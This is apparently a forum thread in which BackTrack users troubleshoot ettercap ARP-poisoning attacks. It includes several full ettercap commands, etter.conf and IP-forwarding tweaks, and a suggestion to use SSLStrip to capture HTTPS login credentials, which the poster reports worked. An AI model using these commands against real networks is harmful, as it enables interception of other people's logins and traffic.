hmm... possibly check for a "1" in /proc/sys/net/ipv4/ip_forward
ETTERCAP - Buggy
Hello fellow Backtrack Users
I have been holding myself back from asking this question for 7 days now. I appologize if this has already been adressed somewhere else, i have searched above and beyond and to no avail can i solve this issue.
The issue is as follows...
I am running Backtrack 4 on the acer aspire one 160GB version
Backtrack 4 is running from Kingston 8 GB USB with Persistent changes
I am using ettercap in terminal via command line
When ever i execute the MiTm Arp Poisoning and try to visit a site that requires a log in such as gmail.com youtube.com hotmail.com etc...
The browser(IE And Firefox) hangs/lags/ never loads the page, the status bar shows the loading of the page, but never acutally loads it (Vista and XP SP1, SP2, SP3)
__________________________________________________ _______________
I have uncommented # the iptables in the etter.conf file
I have tried " echo 1 > /proc/sys/net/ipv4/ip_foprward"
and " echo "1" > /proc/sys/net/ipv4/ip_foprward"
I have tried
"ettercap -i ath0 -Tq -M arp:remote // -p autoadd"
"ettercap -i ath0 -Tq -M arp:remote // // -p autoadd"
"ettercap -i ath0 -Tq -M arp:remote /192.168.1.1/ // -p autoadd"
"ettercap -i ath0 -Tq -M arp:remote /192.168.1.1/ /192.168.1.100/-p autoadd"
I have also tried
"ettercap -i ath0 -Tq -M ARP // -p autoadd"
"ettercap -i ath0 -Tq -M ARP // // -p autoadd"
"ettercap -i ath0 -Tq -M ARP /192.168.1.1/ // -p autoadd"
"ettercap -i ath0 -Tq -M ARP /192.168.1.1/ /192.168.1.100/-p autoadd"
__________________________________________________ _______________
I also purchased a USB wireless key (TP-Link TL-Wn321g using the rt73 Chipset), thinking it might have been my integrated card causing the problem
It sucessfully captures credentials if i use outlook and windows mail...
I can browse to all other sites, except those requiring a login (as stated above)
The issue seems to solve itself whenever it decides to (1 out of 20 tries)
Each try meaning, re setting all pc's, unplugging and pluggin the router (linksys wrt54g)
Driftnet succesfully captures the pictures
On my Windows Machines the "arp- a" command in command prompt gives the following result
__________________________________________________ _______________
C:\Documents and Settings\Zeus>arp -a
Interface: 192.168.1.100 --- 0x2
Internet Address Physical Address Type
192.168.1.1 00-13-10-99-a9-e6 dynamic
192.168.1.102 00-23-4e-2d-22-63 dynamic
192.168.1.103 00-23-4e-2d-22-63 dynamic
192.168.1.105 00-23-4e-2d-22-63 dynamic
__________________________________________________ _______________
When i would press "q" during the arp poisoning attack to stop the attack
i used to receive the following error
"iptables v1.4.0: can't initialize iptables" 'nat' : Permission denied (you must be root) Perhaps iptables or your kernel needs to be upgraded"
i "solved" this by
by editing the [privs] in the etter.conf file
ec_uid = 0
__________________________________________________ ______________
On the rare occasion that Mitm Arp Poison worked, when i pressed "q" to quit i would receive this error anyways
"iptables v1.4.0: can't initialize iptables" 'nat' : Permission denied (you must be root) Perhaps iptables or your kernel needs to be upgraded"
before editing the [privs] in the etter.conf file
ec_uid = 0
__________________________________________________ ______________
I am having a very hard time analysing the source of this problem
(The browser(IE And Firefox) hangs/lags/ never loads the page, the status bar shows the loading of the page, but never acutally loads it (Vista and XP SP1, SP2, SP3)
because of the inconsistencies, nothing seems to cause it to work, or not to work...
If anyone has experienced this Please Post your Success/Failure/Workaround/Solution/Concern
__________________________________________________ ______________
Off Subject : This being my first post, i would like to thank all those who participate in this forum, i have been using this forum for over a year now, and have never have had to ask a question because of the excellent support...Thank you for all the great documentation/support/tutorials.
Keep Up The Good Work Everyone
hmm... possibly check for a "1" in /proc/sys/net/ipv4/ip_forward
dd if=/dev/swc666 of=/dev/wyze
It's the ssl on the pages that requires login. You need to set up ettercap for mitm SSL.
edit etter.conf (use locate)
look for iptables under "Linux" and uncomment both lines
ettercap -T -q -i whateverinterface -M arp:remote // //
I have the same problem with ettercap in -M arp:remote mode; despite echo 1 > /proc/sys/net/ipv4/ip_forward and configuring etter.conf for ec_uid and ec_gid=0, and redir_command for iptables.
I mean everything go well with http but traffic is blocked when "test machine" request https for igoogle or facebook. Captures with wireshark see "test machine" TCP requests for https but no answers (see below)
Did you fix this ?
Suse 11.1
ettercap NG-0.7.3
wireshark captures during https requests from "test machine" (192.168.1.101) :
No. Source Destination Protocol Info
673 192.168.1.101 74.125.65.147 TCP ecomm > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
696 192.168.1.101 74.125.65.147 TCP ecomm > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
735 192.168.1.101 74.125.65.147 TCP ecomm > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
820 192.168.1.101 74.125.65.99 TCP stun > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
843 192.168.1.101 74.125.65.99 TCP stun > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
878 192.168.1.101 74.125.65.99 TCP stun > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
950 192.168.1.101 74.125.65.103 TCP twrpc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
969 192.168.1.101 74.125.65.103 TCP twrpc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
1000 192.168.1.101 74.125.65.103 TCP twrpc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
1071 192.168.1.101 74.125.65.104 TCP plethora > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
1072 192.168.1.101 74.125.67.102 TCP nppmp > http [RST, ACK] Seq=638 Ack=126 Win=0 Len=0
1073 192.168.1.101 74.125.65.100 TCP genisar-port > http [RST, ACK] Seq=725 Ack=268 Win=0 Len=0
1074 192.168.1.101 74.125.67.102 TCP nppmp > http [RST, ACK] Seq=638 Ack=126 Win=0 Len=0
1075 192.168.1.101 74.125.65.100 TCP genisar-port > http [RST, ACK] Seq=725 Ack=268 Win=0 Len=0
1092 192.168.1.101 74.125.65.104 TCP plethora > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
1125 192.168.1.101 74.125.65.104 TCP plethora > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
1188 192.168.1.101 74.125.65.147 TCP cleanerliverc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
1203 192.168.1.101 74.125.65.147 TCP cleanerliverc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
1236 192.168.1.101 74.125.65.147 TCP cleanerliverc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
Ettercap is buggy when used in windows, but its never gone wrong for me in linux.
Try using SSLStrip.
http://forums.remote-exploit.org/bac...ettercap+https
Does that help?
~ Have you, g0tmi1k? ~
:rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:
Still A No Go
Thanks to those who replied, i tried your suggestions and unfortuanently i am still getting browser hangs...I also tried the Sslstrip, but as soon as i execute the arpspoof command all the SSL sites hang...I really hope I or anyone else find a solution to this and posts it here...ETTERCAP is wonderfull, but when it doesnt work its nothing more then what could have been, a hope and a dream...
g0tmi1k I put the little pride i had left aside and tried your suggestion AGAIN and all i have to say is WoW...not only did it work, but it worked again and again and again without FAILOriginally Posted by The_Spirit
My hat (the black one of course) off to you
Thank You
Your more than welcome! Well done for getting it working & trying again!
Please, put a white hat on
~g0tmi1k
~ Have you, g0tmi1k? ~
:rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:
Posting Permissions
